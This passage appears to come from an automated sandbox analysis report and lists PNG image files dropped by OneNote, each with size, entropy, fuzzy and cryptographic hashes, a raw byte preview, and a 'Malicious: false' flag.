                                                                                                        Preview:.PNG........IHDR................R....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..x.U..I...JB..;H..."..(U.EE\\..._v]W..b...Az..{G:J..B.$...H.IHB.o2xE..3gf..w..2....w..s|.....C.$@.$.....t.!........8......RR....<...6..P||....$@.$@...PO..$@.$ ...T.GZ!.. ..)c..H........H+$@.$@=e.........S1.i..H....... ...C.z*.#........1@.$@.b.PO.p... ....2.H..H@......B.$@..S.......!@=..VH..H.z.. .. .1...b8......PO..$@.$ ...T.GZ!.. ..)c..H........H+$@.$@=e.........S1.i..H....... ...C.'++kH.G.=Z!.U...73o^.IH..O|jrj.D.......I.M.........Kph.............R.x.......RU8_".......j.......B"O.z.|.9.."..L....Y.d.Rej.-Y.dhX....:.xH.z.!(>&..4.....O.<..T\.%a..e...*..UnR....+j...2.."..M.O>.z......T...].j....m...S.`..&..)....f..2..............+..SP..?.a...=.....3......K.zj.5.fP.......2:..?.....%....d.qxC..W.~.._....!.W..6....iJ)*.(..wg.}.]sw\.r]...r"...e_-....5_9.YN'...PO-.d.:.%..wZQ...H...JMJ.6c....|g*..,.3.....T...o..Nyc.W.....A.3.._...U%...PG.z.....&.%.v....AIm.....~.
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced
                                                                                                        Category:dropped
                                                                                                        Size (bytes):16003
                                                                                                        Entropy (8bit):7.959532793770661
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:384:1l+zN+iNurNE/tBdEC/vkape2XHYdhOm+Bl6C4:L+zN+iNurGNEC3fpe2X8Pa+
                                                                                                        MD5:3A5CD52E925A7C4A345047D8F06C3C41
                                                                                                        SHA1:9C02828D83206BBD3EB58930C8C65A6CA5DBCF40
                                                                                                        SHA-256:477277E8CAAAE1D3B3EAB5B3660239AEEABC433743A191727B1A71E529872AC7
                                                                                                        SHA-512:8D8B6AC645ECC7C8BD374E6190819006C71AC0B5993419C42463009116214E5EC4B4235D94B4AE4CDA132E7DDA9807ADC51525824AC5F12696517FFC8890891E
                                                                                                        Malicious:false
                                                                                                        Preview:.PNG........IHDR................R....sRGB.........gAMA......a.....pHYs..........o.d..>.IDATx^..|.....+)..H..C.K... ....x).rU..T..*E...;....*.@Z.....@...9q.g7[fgggg.............1//.."@....0..#.t..f.C..."@.....@OIR.#P...0..$...y.Pl"@....( @zJ]...." ...Si8R*D.....S..D....i...J.R!.D....R. .D..HC..T..... .D...... .D@.....p.T... ........ ... =..#.B.... =.>@........4.)."@....).."@...4.HO..H..."@.HO...."@..!@z*.GJ...."@zJ}...." ...Si8R*D.....S..D....i...J.R!.D....R. .D..HC..T..... .D...... .D@.....y.?.`.T... .f.P...$47........~E....!.D..X............].`....0..N.a...>[||...t.T.w *.. .....)'...=X?c.......+OE....<-84...=.....w.8...7.Ro&.D@!...GS.....s.......:...Gg..8..T...u...~..............<...S...../Y.......W........#. .vB...u.. .+.999YYY......wf..._.{6....=..]>Y?..;=02eb......2...;.%..\...P..R5....XMO.....6....W]...3g.5;.n{t.......F7S....r...[n.......AAX..j[.j.;.neef).2.....{ ..r..{7.-........i..S........<..pm.u.V....M.333....K..Mr.s..Ek..=t_.#.P...
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:PNG image data, 164 x 89, 8-bit/color RGB, non-interlaced
                                                                                                        Category:dropped
                                                                                                        Size (bytes):4190
                                                                                                        Entropy (8bit):7.94161730428269
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:96:GHfueo3dRLZKOSYDzGsEgfB9nqS0WKt/z2jOrrz7yrT7N:8A6AzZfBtqS0WKNC2vyx
                                                                                                        MD5:8B3AEC1986A522951942BA72B85CCAA0
                                                                                                        SHA1:7E0DC78FC65EE4C804A4B0C72AA53E2DFDF26C14
                                                                                                        SHA-256:8B02CEC726DECF033B67689F369FDE1002ACFD5F8C32E0F248AC575997204F2F
                                                                                                        SHA-512:8EE1A1F6F0023EB4F60760C2E23EAFD56E6D298CAB49D819CF1D62C0CCF608D4211D3767856255F7CF8FF45AD835FE5475EB92C608989C522CD48D00A050B189
                                                                                                        Malicious:false
                                                                                                        Preview:.PNG........IHDR.......Y.....?.......sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.]ip...fu.VBBZ..V'.>........CR......?r...pU\....v*...T~.U)0..('`....."..,a..Y..$t!...D...Mkvf4.VhW;S........{...zZw...i......fj..$..7......[Z*.[.[..Zk...?.t:M..,..`.^...X,..sUK[..Rg.=$..!.3<....74...iY..i...k.,.fA..Z.n...`G.%..H.l7..7J...u.R..6....E..!....N@.....M....Q`...U2.w.WP[!fX......c ./@7Mz....^...k.)....v.Q`..z..1A..P.{...||...vY.....>.`...K...m.?CX./v.8.....]..;...6..kw......N....z.Q...f..q..xk.5....;.?.Z.c...`......4....?.....VV.u~..<_......sU4e.....g.c.G....O/..r...`.G)....#d5.O..w..{....twL1l.)#&hF..K...M[@.Dl..V2..j.3..s....3M.....v..!....V..c..B...|..e.1....7.WA0.[.\.u.).$7f.+.......8..e2K/.%.Ii..`w6w.E..[?_.?.?..I.k2.s....]..f....HM.?w..d.9..Rr....Y.c.}.s.zk..rc...a..I(9~........m...Z............I........7.K:.:Bf.......m..1.......&..,...?a...c.@.@.g%...s.#...;..c6...g.lZ....}.WX.3.8.....W....N.w...L...}....?.".......;cI.............pS
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced
                                                                                                        Category:dropped
                                                                                                        Size (bytes):11332
                                                                                                        Entropy (8bit):7.9324721568775285
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:192:vpXZavBpl00n1Pt7JquG9GYHDK/5cxektxMQjcie9ZZkx30eXJIb8FKRN:vpZaDyc1P1Je9G62/5clpjre9nQkeXJY
                                                                                                        MD5:31579CA3352DF8FA4E3E7F48C7CDF672
                                                                                                        SHA1:AA682A3C781BF8EE43B5EDC9718E64CB79135F25
                                                                                                        SHA-256:B0E7824BEE2C896279457D87E61E902431BEB528D830524CC4DFAE126E89FC24
                                                                                                        SHA-512:782FF9492E3ECB11C72D316DDD94D1F3E94CD908FC9452A37DA6CA30ABCFE9AB2BCCED8583A569DA68626BCEC730408AF86997E295637BF64AFF5BC768F3E309
                                                                                                        Malicious:false
                                                                                                        Preview:.PNG........IHDR................R....sRGB.........gAMA......a.....pHYs..........o.d..+.IDATx^.{...u./-...&....6..+z..Q."b*. &M.d-e.*.. ....J..Z-T.Z$....R..F...%*`bn..<.....W.E ..w....^...;g..[w.5w.9g...3......t8t.P.?$@.$@.5...=.8qb.... ...5...a=...#.y. ...@B.....am. .. .......$@.$`.....G.B.$@..S... ...C.zj.#[!.. ..).......!@=..........}..H.........VH..H.z.>@.$@.v.PO.pd+$@.$@=e. .. .;...v8... ...................f.o_o{....~t...n.S.N..?..._..L;J.H ..,....7.}...|....7...b...|.........ObVa1. .?.X.....~.....t2..V>.b.}..0.F....%`GO7.n#~..F....K.~...FX..H.^....k.Z/.2v.W..M.<.;$...v.t..,UO.-]............D.....o.J..Y........5.%.l....{.....'O..dC$....=uks..;{x.,.N.=.."..Q]..w>.E.H........AV=...f.&. ..ip}._0.~[pf.`..9..v.W.,..2.E.$P........+...OcC.H..=..|..[..g%(h.....W...?...UDh..T$..?....|.]..)?[Wo.h.'..2P.1..!.......$.NO.5..}...c.;...~.x,|Q....B..6.@>..y..}...m...D~z....L#.0`_.`.s?|....I.....a...=N....c.._.2.._..6 .]...5....{.^>.lM..;n...k..9J..S.G..{.
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:PNG image data, 340 x 79, 8-bit/color RGB, non-interlaced
                                                                                                        Category:dropped
                                                                                                        Size (bytes):4490
                                                                                                        Entropy (8bit):7.928016176674318
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:96:WXKr7Xwf6Obg+XaGOnsjbbGSb+ydWtRvEOhDE6XqPeosv02tR45boo:3rTUgXZnsHKSb+n+8DdKlwm
                                                                                                        MD5:7F161B19B937AB48D4FD2F6E5E16FDBD
                                                                                                        SHA1:BDCE4F1C73E87E609A7FDF245A512CA4F73B35B9
                                                                                                        SHA-256:C863C5E71D1116D69561BD0637F4FE4C4240E9CED05B8A5B056073AD13E6495D
                                                                                                        SHA-512:E915B76FAAC9512D2AD11CF4E4530A19BEA1C7D8508BC218C69CB041F1EEABA3E2E03B1D56E61B032A6418829752C21B8354AF1335466D7E1528A06E6742A461
                                                                                                        Malicious:false
                                                                                                        Preview:.PNG........IHDR...T...O.....;.......sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..p.U..'...rD.WX.... Q.. ....."$.ZHP.Z...C...........R..%G8R..... .R.C6..A.b...0...^...#..g..........z2.....nB...l..X.&._.a,...a,...a,...a,...a,._.73'N..ukeee.6mZ.n.m.G.}...n...a.9s.DGG....y...8??.o.pE1....Y.,......).ca.i.M.:5$$.........Lr...ye........6...8...z.-r....d.(.xc..U..^11...._>.QX..y..2...T...sss1..."A.?_.;w..S.F>......4.G.......D.|...@.K...............C...k...P...q....6.`QQEE................7;;;.._\q.k.|...\.z..6j>..n....Y.&G*.n.S$))).....r........}.{[Dv:,..w..A...`..........a.~.N.f.s...P...*..'7n....eK....+.n;:.W..C..9}..O..D.q..X..5i.s~en.c..F&..?.....l.]3r...W`..#..7o..R.@^..*...W..?}t...{.B.8..D...UPa..~..C...|.C].a.9..R...c.Y0..9.u...d...C.......X.U....WK.....5...'..PM.`...<. ._.z.F^^.EH.K>_.0.d..S...Yj<..~.5.?l.fZ0.@d.....*..G...K.....e...b.|e..Q.4.....('z...!G.....2..XQx\......X...2.\h..X~.e....Z....=....C.1.......w.....d.z.
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:PNG image data, 454 x 278, 8-bit/color RGB, non-interlaced
                                                                                                        Category:dropped
                                                                                                        Size (bytes):13241
                                                                                                        Entropy (8bit):7.931391290415517
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:384:a99pmP85w/MAMszG+iHGgrw8Ld+9aEsjQR:mgP85AMs6+UtrX+9mjQR
                                                                                                        MD5:01367FEEE0A83E8765E971E0D3740900
                                                                                                        SHA1:CAE1FD22CE2539FA2ACC0242C615CB7EA3F866E1
                                                                                                        SHA-256:18B8E53505DA3C412890F4D74AE2A6B26C4B0827E15E830F92A024D292AF20ED
                                                                                                        SHA-512:8CFBDC014C42AE6417038B80424D2E9FBDDD7DFDDF579E349C3C17C9B52AF33A72463154D29539457C4ADAB2DB00CC28A67902FA8D9209E4AF00EDD46D52E5CA
                                                                                                        Malicious:false
                                                                                                        Preview:.PNG........IHDR.............s>.Q....sRGB.........gAMA......a.....pHYs..........o.d..3NIDATx^...U...Y.]:.T...G.5..lX...B..Xb4F,I0X.....F...("vET4H......*EX........wo9..9.|...rw..;...;o......z.....B.......v.mn..>......E."....U...4s! ..F...u?.@...! .~F@... ....p..Q.kP.#! ...(U{@...!....T.TGB@...Q......B.5.D..A.......~.*.U{.].....S.e...K.A.......7^?....D...h;...!.Eu...o.^..B@..# J...B@....(.5(....B@..= ....p..Q.kP.#! ...(U{@...!....T.TGB@...Q......B.5.D..A........T..! ...k..R].R...! .D...B@..........:..B@..R........! Ju.Ju$......j...! .\C@.....H...! J....B@....(.5(....B@..= ....p..Q.kP.#! ...(U{@...!....T.TGB@...Q......B.5.D..A........T..! ...k.D.RK.K.m.V.......(.^^^ZV^Z.7.a..........T..xsqYi....L......z....}....?..yyy.M\.b..U3W.0{...~.`}..M%.J*.w.mdv.&*..@....R..o/.^..5...x.g.>..ag....GM|t....\<s..y+6.X.? ,.R...-.W.m\..o..0g..i...h..W.Z.i...2.....o.&..@...-.B|.K..^.....u.}.M..6...,(...e.V.X........nkE....5.8....-.!.TtRxs....Q..2}.-..`....mX6i.w...
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:PNG image data, 167 x 92, 8-bit/color RGB, non-interlaced
                                                                                                        Category:dropped
                                                                                                        Size (bytes):4181
                                                                                                        Entropy (8bit):7.943341403425058
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:96:b6JWqvCl45Da8kuGzhRwZvwIutfij19MQ8EpW14LBGJVCq:b6JTCl45DalsBws1R8914V5q
                                                                                                        MD5:817D5A35EDB2B0E052194D4F49FDA19C
                                                                                                        SHA1:FA6CB2016C5F43B76102B63D60359139227E07EA
                                                                                                        SHA-256:0A87B8418B7F8E6E117BADDA11D7CDD38B8B7320C6BA3D3E9AF93EB9ACB2CE14
                                                                                                        SHA-512:E0686BDBFC589401F0EAAE2B1598199EFA285F8392742B1C928B9274088804B23DCB584B6FEF68CE6D7E54DFF9C10338104F4C0F3F80A04471F0B2E8F9935CC0
                                                                                                        Malicious:false
                                                                                                        Preview:.PNG........IHDR.......\......!2a....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.]iPTW..iv..D.....%DQ#A$...d..h,.T~..+...TM\cj*.)k.fj~L~$...L&...,...:.FdU..f_......._.n.m.....q.s.9.=..w.9......$..b.*..%....@A]A..%..<......l.h.+../..OSe.....]...>..C........^cCy.0nz.4<......g..?~..>.1ws.B....07W65.74T....=..v.......D....6.....tR....}]}....4z..^....7..;.."......^.....|=.#.=.32..o.<.Tn*Q....g.zN...n*...!/.........!....F..]...6...m...CX..~...+..U...E.|.........7]=rE?i(..$`e.%.`.....w._.Y...l.1...@....t.P..=.}..*...N...N.|.xS.5&.....Pe......Z.Z^XJkx.....^.....?7..._....Wsz......}G..]...\.....,[.y....}.J....'.R?a...G5..l.i.?....MH..l.DC^._.c.m.....%{;z.&.*+x;...S.....zxyH..`.._]...el^........U.T..^..p..z[.6(2x..,#;o##..}Zv|Z..............V.....0}Z....]..m.....x..).k]&e.._.W!Vry..%...I..d..}w.....^..\............m[.^.3r.......-8......j....>...Q..T..{\V\ptH.?........1..w....FHl...x.....\.`.ei.w..)`...g..V{..Z.....8..........o.._..
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced
                                                                                                        Category:dropped
                                                                                                        Size (bytes):14553
                                                                                                        Entropy (8bit):7.951135681293377
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:384:EF7aDrPYJ1n3kaEf61xD+KvdokCixTQm7QA96dNT:EF7a/PMeaEf61lT6kCiFQCQq6zT
                                                                                                        MD5:3E9F7D399DF9CAD3669B7A5445EF7074
                                                                                                        SHA1:2FBC965DC03EF9203581F595E0D7AB1734726ED7
                                                                                                        SHA-256:76C80E31F37248C3C787F7972A7B22038390F9D81E72E650071A6F36D36AF27A
                                                                                                        SHA-512:326F8F9CBF829BF80AAA96062A57255A36EE04DE310634327AA075D14129CFA8E36E48AB2A00B10F9BDC1D94F1AC7A9E41D0D063361920A0332EC124BDF4C3EE
                                                                                                        Malicious:false
                                                                                                        Preview:.PNG........IHDR................R....sRGB.........gAMA......a.....pHYs..........o.d..8nIDATx^..xT...!=!$..%t..H.tP:.HQP@E,...QQ.^.....* E.(" ]:.K..R......p..n.9{...sv.}.....7.....o..z...,|.......M +.....w........O...>.SJ.O...<...{. .x..g..I..H.......V .. .}.PO..H+$@.$@=.=@.$@.......VH..H.z.{..H...!@=.#...............C.z..GZ!.. ..)... .....T...B.$@..S..$@.$....>.i..H......H..H@...S}8......POy......>....p... ...... .. .}.PO..H+$@.$@=.=@.$@.......VH..H..zz?.......$@.$`i......c;.n..i...0..........<......S....w..c.....y..F4.p..3~..|.]....s.6[..H...N@.=M..|`...3./...I.....'..|..K...r|...nX...'.. .G...ib|...MY8|......9x..Ur'.. ._ .....5..H..d..L.$@..I..o.;kM.$.?........K/.wn......Y....E..%K*.=.......Y.3.!k....[V..WG/?i..H..." T.,z...6h.[..-%9....WMY...z.vH..H@/.BOe....g-P.@.......lH.O...SJ}5.|....?.^..5^}..$.. .....S.@...*<.gJT/......_.R.C.....rj..Cg'\K........K....~Y....l@..)..l.k.s..Yr.....Z]jG..q.+..G...;lNJj.}..T1&&.. .....?...|....W<{...g.&'Ca
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:PNG image data, 230 x 68, 8-bit/color RGB, non-interlaced
                                                                                                        Category:dropped
                                                                                                        Size (bytes):4181
                                                                                                        Entropy (8bit):7.950380155401321
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:96:L6ousL3eslFAmjb89xK6YiSTwtw5dTA1W9lQ:GoFiUFAMbsxJYieZ5dGklQ
                                                                                                        MD5:BC6C08F8C2C6D1EEE95ABFC40C3C3669
                                                                                                        SHA1:44DE7375375880ACC24938D7E92A837E85C35321
                                                                                                        SHA-256:6E54B502C46E1AFA57E28B8ACCCE24F102399F31407827A91E4CD7A42FCBC746
                                                                                                        SHA-512:2AF4A9B87FA4F362926CD77F272CECBE3ED4F0E110FB8F30F661DF7C61B77B9FD8E7716EEF9177B1038B68C792CA4F844F729DAA48B2E38B9945EC9CB44BB720
                                                                                                        Malicious:false
                                                                                                        Preview:.PNG........IHDR.......D.............sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.yp.....E-.......-v...VY.a.d....R.euF.).KH@.*B..u@YdQ....!&.tjg.!.,a'.L..@H...{'\~yy.....w2z...s.=..;..s.......]..j..b5d.j.X...2D......r.\.#..f...Bl.....5dC....r...............:m.....s..j.f..jK....y.^....'8.....<......g.....=.%..2.p..}<.....G.....Ix.m.4dm..B.......0?..+_.*..c..n.......?....wa..l...p....E.Ly.}...*...C.D.vy).....@.>\...3;.`].q..m../.d.B.../......~.p.U..'...sP\....YH.7.../....R!...O...'.....s....<|.f)....i.{.I..l.a.n...?~.{...h...s.e..-..Q..R..@<;.y.G.+n.....Y.Y'.V.}.o._..?...,.>}..\w....`+.}.{.p"d.RO=&.v..H].....k...X.c..z.{........}.n....s:c...i7N...|....*\..O.*....)w..[>..E..}y....q..u.!.z.D.[`Uf.Y...>z\..x.B.h" \.}...`...|._.....G...hY.../..6>..Z...8^..k.E.5d#..a."....P.CR....OL..U...qY.{.C.<~I=V..x.J..*k.Y....z.;?..^...3.4|i...[DL,..z].._..a.....(s./...W~..q*.\#@[R.N...@.."..=....\q...<.......p...+J..\#...(.,....OQ...$L...G...
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:PNG image data, 171 x 50, 8-bit/color RGB, non-interlaced
                                                                                                        Category:dropped
                                                                                                        Size (bytes):2270
                                                                                                        Entropy (8bit):7.845368393313232
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:48:3Cxnazs22lovji2Ez2iqBU2C+hJWizJNzIu1coqAYClBeMsk1:3dm2Ez2iUhBzhyjAxqQ
                                                                                                        MD5:6EFE6733E10E011FFDD6711B5F37C9E2
                                                                                                        SHA1:C72549E824EAD899944A38C46FBC28BDCDAAD611
                                                                                                        SHA-256:92B5056DAA03DF3EA85AF49FFE4F9CFE8699BDF3539576A99F02418FF49AD9CB
                                                                                                        SHA-512:EC14B553A5780CD9B33D438CE13A6932DE43E346D8D2DEC8D093A6A2048675423948F8E2C604A73460980C3C68D9276B65D76C2A6BC7B24FDF10CA92FDA2583E
                                                                                                        Malicious:false
                                                                                                        Preview:.PNG........IHDR.......2............sRGB.........gAMA......a.....pHYs..........o.d...sIDATx^.\kL.W...*.F......@.*.(H4."iI}..B!.iD...I-....y.I.h.....<..1.....C..(XSy.l....,-,.......3..3...;.{...{.{g.....Q..x.T/q...F.V...B..'..?{:.:...`.........+.0s.e...w....{.`. ....5...d..9S]../............$Y.>.I....i..8....;,r8r!Ee'"..!*.&E.....n...=.@..Sp.GF..c*....1QH3....?,.T.el......t?..([Q`.0....k.G.....X..C...k|p...I.q;.d..N....c.u.a.5.%.k.fS\)..H..T.~l*k.[.n...x2.1...........%...yK..a..l.[.?#..fD%.FMT. =r.jt^..fT...c.&..Lr..............\..V.ll....Br^6..U27...O..N*..K.gm.K..g.;..l..Fe...w?..Q.E......0.........7...(.e..t...x.c6..Q..n.92:%....l..4.h]Z.....w..|..!.p.~..B.y..&.......gl...\.wI......G.6.K.$...%.-.h]\8.LT.....}{a...^.i......4.0.ji...........n.pk ......7t....U9..b...I.....#...<q..(|=F.......0@^......+..........X. .>p....S..t.].f.x.0....7d..n..'..'... .M.qqn...G.t8'.=..V.PK....K...X.z.#..I.....@...Y....BH..I.....,..K....=`&Z.41$..a'o.:....i{o
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:PNG image data, 454 x 278, 8-bit/color RGB, non-interlaced
                                                                                                        Category:dropped
                                                                                                        Size (bytes):8184
                                                                                                        Entropy (8bit):7.807848176906598
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:192:ExqMHYnnEnntvA4Mesu3SXHycmfIEFQp1r/:E0MGEn29esuiXHt0FQp1
                                                                                                        MD5:5B386BF9A20766956A84F67F913F23D7
                                                                                                        SHA1:6E72E51F5B4FA64E52D2B80B41409B3DB927A3C7
                                                                                                        SHA-256:DDF6A1D5B29BD69C65A148B1247FDE8389CC56865E4398E4CBDCBD68A6555043
                                                                                                        SHA-512:99B4109439D9A688D7747C6847E0FF7399CDA01A89C3181789F913E757A82EE4727F95E506F4B01930EFC7C6E229B94BB89E385B56BC009AB5CFE332585660C5
                                                                                                        Malicious:false
                                                                                                        Preview:.PNG........IHDR.............s>.Q....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^...]...!.......!.YTP.A......-..r..$.E.J.I;....T.M.UE[..Q..x....wKB=.m...4.%..|:...9...\{..o.3..g.o~..~s...k...X.r....... ..@Gggg.?.... P_.]]]..*Iu....C...h..$...:... ..... .\.......@R..... ..$.k....@0.Hj0.8... ..r.@....F.I...G.....T...@.... ..P........5...@ ..$5.J.A...@R.. ....#...C.#.@..H*... ..`...`(q...@.I..... ......%. ... .\.......@R..... ..$.k....@0.Hj0.8... ..r.@....F.I...G.....T...@.... ..P........5...@ ..$5.J.A...@R.. ....#...C.#.@..H*... ..`...`(q...@.I..... ......%. ... .\.......@R..... ..$.k....@0.Hj0.8... ..r.@....F.I...G.....T...@.... ..P........5...@ ..$5.J.A..............W_...1c.l..6..`...@ ..I.S..I.I'...5.\..;....'1. ...........c..k.u.Qs..}..g#b.j.@..Y..QR...n.!...-......h..Z.......Xw.U.~q... ..@.%.'............. P..E.T.b.:j.(F..p.... .C.}3.'.|..z..w.a.....\{.:.4[.lY..~...x..'/....g....J..9.K_...'...:..;)......SO=u..E... Py.qf..}O7.o....u?:....6~~..9...?7.
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:PNG image data, 221 x 77, 8-bit/color RGB, non-interlaced
                                                                                                        Category:dropped
                                                                                                        Size (bytes):2599
                                                                                                        Entropy (8bit):7.903700862190034
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:48:PmCwDJh8w9JewaF2zQNXXj8zq1KM43sxXxjYbTgJW1MFsrJ075CawGjGj:P1Ah8UewaFcgz82Kx8xXNYb3id/yj
                                                                                                        MD5:E88131C9AAC52649FF044905ACAB9B76
                                                                                                        SHA1:34AE73B9165CBED0DDF33AC20E4B3E7D622C19BF
                                                                                                        SHA-256:30F22340F582F9A352A7ED3048D1088F178E83CCAACAC1CCFD86852C8F9C78E3
                                                                                                        SHA-512:97AFE8F3A2A3138613934AC737C390A35F6757BFC3D381EA7C7CD148F739932380DCD46D0BA6F590C274F8BFB4D4286B3C0433AA69E090102A8A9ABDD7C97EB1
                                                                                                        Malicious:false
                                                                                                        Preview:.PNG........IHDR.......M.............sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.]kl.U....B|E..>...*..Q........b[.K........m.(..... ...!%1%*-B.C~(&`[.....-.....~.w3..Kw.3wvfzn.2{..s.....{w..\....!.3..:..!..../..zD.x...O.K... ^.1*...8.G...z...D.$...........>!..V..`v.CQQQ!..-L...../3.2......ZH.?s...Iu\N..,3.?.p..N......<....E.<.=z..Iu<ll.dX...g....+.{X.p.....:..t...a...cKK.|...Yszl.N.:......KPs.):).T.5...&B...*..5j``@...(_r.V.j..m...?x.sg...t\.dz.'^.=.\.h..<.y....:.I...w..ze.m.\.qPJu.....D.|..@......W..t.+.....X....e....\H+.Ns%^r.VS.N.3:...&...._..#^....d! ..F.....xc..M...q...17.z...z&C...K9(.Ifm.35.v.>.'X,...p.:=.H...J.K.,...:~...7.t.....R..R..9..?....l../.(...0z0.M.f.)H..Y_"e......B........L...q.K......|;..L.........xI.K3.M..%........./..){....R....s...7....).q.._R.4O.a3......<..%....3#.|>..y...u...R'.P..$Klz...........,...g.....`.7..\...x>.{p\;>+.,.....e.-..Re@.N..FY_....*....]}...[..h.M.oq.S.U...c_}`......8TP....
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:PNG image data, 452 x 277, 8-bit/color RGB, non-interlaced
                                                                                                        Category:dropped
                                                                                                        Size (bytes):22634
                                                                                                        Entropy (8bit):7.974332204835705
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:384:5ojjyi45m1/9gyhgFsH1ud103Pl39o0qjfsH37mNHy7QPaNbZy0:+r45m1/BWKy10tN22rmNHycobE0
                                                                                                        MD5:548D234C9AB4021CA5FAB7BF22502465
                                                                                                        SHA1:2F7495D250DC86EA99473CC342D164B859926021
                                                                                                        SHA-256:7D549C3418CD90F42571D00936B23D242837CE2A8B19FC4C719E182ECB2624C6
                                                                                                        SHA-512:261523F5EAE6FCE2829B53AAC5938B1A0021C119E00CE82EFFDBD690FE71064E0F3B313ED1AB2F67A16C488AD5B1A91F5AF98029D88A7896F271C108410D42C5
                                                                                                        Malicious:false
                                                                                                        Preview:.PNG........IHDR.............._......sRGB.........gAMA......a.....pHYs..........o.d..W.IDATx^..i.=YY6z@..DP.i.IAA........l.Dd0"p0.ON.~....s>.?zbH8..%$`....b7..=....25*.".L. ..u_..f...j.........Uk..^UW]...u..}.{.]t.-.(...J......e...t.....@i.k......_.(.....@...Z.6J......2.O.-P....._.u.=T..4p...e..q..5^f~....@i`....?.....@i..k.........?...u..O|bN.~?MbT%...@.LO.Or.`....$..y.{..o....~..(.;......SNi...6....w....~.{..^w......~.S...g?../|.O........7_...Oj....|......40......9....?..<.3nw...x...g...7.....(<.d...(3.K...;....\..:...'.5.....&...>...t.;....8..SO;../...._.}.{..D.jt.......jc...s..........Z...0q...@......Z]S.(..o.....Og.u.l.i.-.9..)j..~...5.l}..........G......k....Z..c.....}.c.?.\....t+u...15p.....[|......2..;..;...........w...........v.7...I.-w...K/.J...[..N.....W..U#...._.j(...//z.|..kv....];j|../m....t.9.;-0.:.4p..@K.....~.9.$qu.E....!.9|.m.+`).|......x..vak-].../.....G'....4.>B6$.......-o.q..L;*.N+....>...=.!.Y..Q...?......7..,....}
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:PNG image data, 232 x 50, 8-bit/color RGB, non-interlaced
                                                                                                        Category:dropped
                                                                                                        Size (bytes):1570
                                                                                                        Entropy (8bit):7.780157858994452
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:48:r+em8Tlk2APr2fEd72tTqiVJlcLzqeVzYwS:r+erTlk5S+zoyGahS
                                                                                                        MD5:EF9AA5B2ADBE5DF68AC4F4D716DF7708
                                                                                                        SHA1:363B93AAAB9DB2832F6CA0EE3C27C9310C344BA8
                                                                                                        SHA-256:3D94FCC4821A135ABAAE6579011441B94F9C04DAD1E66BB5211B0C019A5968B9
                                                                                                        SHA-512:EC9B024AEA46F7B97D14F0A7E12704D09B85F0017CC9E273CE50F2F889DFDAE81DE549CCD546BBB8F8BAAAAAB7781FEF77BF783E02CCC9605304552F7DD5903D
                                                                                                        Malicious:false
                                                                                                        Preview:.PNG........IHDR.......2......n.f....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.[MK.W...t!.fU..b!....*JBA......%-.F.4$.Nw].....E.$...)T......?@.O{...3w..y.=/"o.9...<.y...X....c.1P6..e.lx....0..J....e3.&\.@)............o.*>.E,;.....~..|....Z.3`K..W0S.&.L._..M.e.`..M.....i_.......\...6g..^....4..L.Y.9.$M...4..L.Y.9.$M...4..L.Y.9.$M...4..L.Y.9.$M...4..2.......q...&...........*.Qg.+.p.......a.:.X6...o2......A.....[).,.p......P......_..>......3.......z8j............>...fww.6....../....S<......^%.4........{.N$..`.!H....`........a..(.G^>~|txx....K\mF..'d.d:9J!.....j..i24.A...`O.......s.....?={....H'._..~..O......*>...ZXX.3...;C....\....%..s=...w<h.......0....~..y..._.......+.n.P.M]c...A..Er|.R...$.g...9*._.jg.....x...&+.JWM4xe..^....0...11.[.....f....r#.h.h$....[=t >...r....L.0.KL..B\..x........4J.0....vY...\dA. w...........g....};.}.....;.......x.|.....)......x....s....N.$.n..g<Z.q.a9.C.....oX..%,KNNN..i.8J..p].1....B>{......n.D|3t.-\g...Q
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced
                                                                                                        Category:dropped
                                                                                                        Size (bytes):11449
                                                                                                        Entropy (8bit):7.91552812501629
                                                                                                        Encrypted:false
